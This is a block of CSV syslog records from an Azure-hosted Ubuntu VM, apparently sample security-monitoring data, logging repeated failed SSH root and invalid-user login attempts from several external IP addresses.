+13267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:45,UbuntuDevEnv,2019-06-26 04:36:45,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46360:11: Bye Bye [preauth],129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46360,,
+13268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:45,UbuntuDevEnv,2019-06-26 04:36:45,auth,UbuntuDevEnv,info,Disconnected from invalid user fermat 5.135.161.72 port 46360 [preauth],129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fermat,5.135.161.7,46360,,
+13269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:46,UbuntuDevEnv,2019-06-26 04:36:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:48,UbuntuDevEnv,2019-06-26 04:36:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238  user=root,129269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,196.41.208.2,,0,
+13271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:48,UbuntuDevEnv,2019-06-26 04:36:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:49,UbuntuDevEnv,2019-06-26 04:36:49,auth,UbuntuDevEnv,info,Failed password for root from 196.41.208.238 port 62115 ssh2,129269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,62115,,
+13273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:50,UbuntuDevEnv,2019-06-26 04:36:49,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 62115:11: Bye Bye [preauth],129269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,62115,,
+13274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:50,UbuntuDevEnv,2019-06-26 04:36:49,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 196.41.208.238 port 62115 [preauth],129269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,196.41.208.2,62115,,
+13275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:51,UbuntuDevEnv,2019-06-26 04:36:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:56,UbuntuDevEnv,2019-06-26 04:36:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:56,UbuntuDevEnv,2019-06-26 04:36:56,auth,UbuntuDevEnv,info,Invalid user 424246 from 95.216.195.95 port 41642,129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41642,,
+13278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:56,UbuntuDevEnv,2019-06-26 04:36:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:56,UbuntuDevEnv,2019-06-26 04:36:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:57,UbuntuDevEnv,2019-06-26 04:36:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:59,UbuntuDevEnv,2019-06-26 04:36:58,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 95.216.195.95 port 41642 ssh2,129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41642,,
+13282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:59,UbuntuDevEnv,2019-06-26 04:36:58,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 41642:11: Bye Bye [preauth],129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,41642,,
+13283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:59,UbuntuDevEnv,2019-06-26 04:36:58,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 95.216.195.95 port 41642 [preauth],129299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41642,,
+13284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:00,UbuntuDevEnv,2019-06-26 04:37:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:02,UbuntuDevEnv,2019-06-26 04:37:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 55900: Too many authentication failures [preauth],129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,55900,,
+13286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:02,UbuntuDevEnv,2019-06-26 04:37:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55900 ssh2,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:02,UbuntuDevEnv,2019-06-26 04:37:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:02,UbuntuDevEnv,2019-06-26 04:37:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:02,UbuntuDevEnv,2019-06-26 04:37:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 55900 ssh2 [preauth],129257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55900,,
+13290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:05,UbuntuDevEnv,2019-06-26 04:37:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:07,UbuntuDevEnv,2019-06-26 04:37:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61997 ssh2,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:10,UbuntuDevEnv,2019-06-26 04:37:09,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61997 ssh2,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:10,UbuntuDevEnv,2019-06-26 04:37:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10  user=root,129348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,177.23.90.1,,0,
+13294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:12,UbuntuDevEnv,2019-06-26 04:37:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61997 ssh2,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:12,UbuntuDevEnv,2019-06-26 04:37:12,auth,UbuntuDevEnv,info,Failed password for root from 177.23.90.10 port 52438 ssh2,129348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,52438,,
+13296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:13,UbuntuDevEnv,2019-06-26 04:37:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 177.23.90.10 port 52438 [preauth],129348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,177.23.90.1,52438,,
+13297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:13,UbuntuDevEnv,2019-06-26 04:37:12,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 52438:11: Bye Bye [preauth],129348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,52438,,
+13298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:15,UbuntuDevEnv,2019-06-26 04:37:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61997 ssh2,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:21,UbuntuDevEnv,2019-06-26 04:37:20,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 61997 ssh2],129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:21,UbuntuDevEnv,2019-06-26 04:37:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 61997: Too many authentication failures [preauth],129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,61997,,
+13301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:21,UbuntuDevEnv,2019-06-26 04:37:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 61997 ssh2 [preauth],129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61997,,
+13302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:21,UbuntuDevEnv,2019-06-26 04:37:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:21,UbuntuDevEnv,2019-06-26 04:37:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:24,UbuntuDevEnv,2019-06-26 04:37:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:24,UbuntuDevEnv,2019-06-26 04:37:24,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 33755 [preauth],129393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,33755,,
+13306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:25,UbuntuDevEnv,2019-06-26 04:37:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3254 ssh2,129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3254,,
+13307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:38,UbuntuDevEnv,2019-06-26 04:37:38,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:38,UbuntuDevEnv,2019-06-26 04:37:38,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3254 ssh2 [preauth],129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3254,,
+13309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:38,UbuntuDevEnv,2019-06-26 04:37:38,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 3254 ssh2],129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3254,,
+13310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:38,UbuntuDevEnv,2019-06-26 04:37:38,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3254: Too many authentication failures [preauth],129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3254,,
+13311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:38,UbuntuDevEnv,2019-06-26 04:37:38,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:41,UbuntuDevEnv,2019-06-26 04:37:40,auth,UbuntuDevEnv,info,Invalid user administrateur from 200.6.188.38 port 17485,129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrateur,200.6.188.3,17485,,
+13313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:41,UbuntuDevEnv,2019-06-26 04:37:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:41,UbuntuDevEnv,2019-06-26 04:37:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:41,UbuntuDevEnv,2019-06-26 04:37:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:43,UbuntuDevEnv,2019-06-26 04:37:42,auth,UbuntuDevEnv,info,Failed password for invalid user administrateur from 200.6.188.38 port 17485 ssh2,129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrateur,200.6.188.3,17485,,
+13317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:43,UbuntuDevEnv,2019-06-26 04:37:43,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 17485:11: Bye Bye [preauth],129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,17485,,
+13318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:43,UbuntuDevEnv,2019-06-26 04:37:43,auth,UbuntuDevEnv,info,Disconnected from invalid user administrateur 200.6.188.38 port 17485 [preauth],129462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrateur,200.6.188.3,17485,,
+13319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:43,UbuntuDevEnv,2019-06-26 04:37:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9261 ssh2,129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9261,,
+13320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:46,UbuntuDevEnv,2019-06-26 04:37:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9261 ssh2,129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9261,,
+13321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:56,UbuntuDevEnv,2019-06-26 04:37:56,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:56,UbuntuDevEnv,2019-06-26 04:37:56,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 9261 ssh2],129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9261,,
+13323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:56,UbuntuDevEnv,2019-06-26 04:37:56,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 9261: Too many authentication failures [preauth],129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,9261,,
+13324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:56,UbuntuDevEnv,2019-06-26 04:37:56,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:56,UbuntuDevEnv,2019-06-26 04:37:56,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 9261 ssh2 [preauth],129465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9261,,
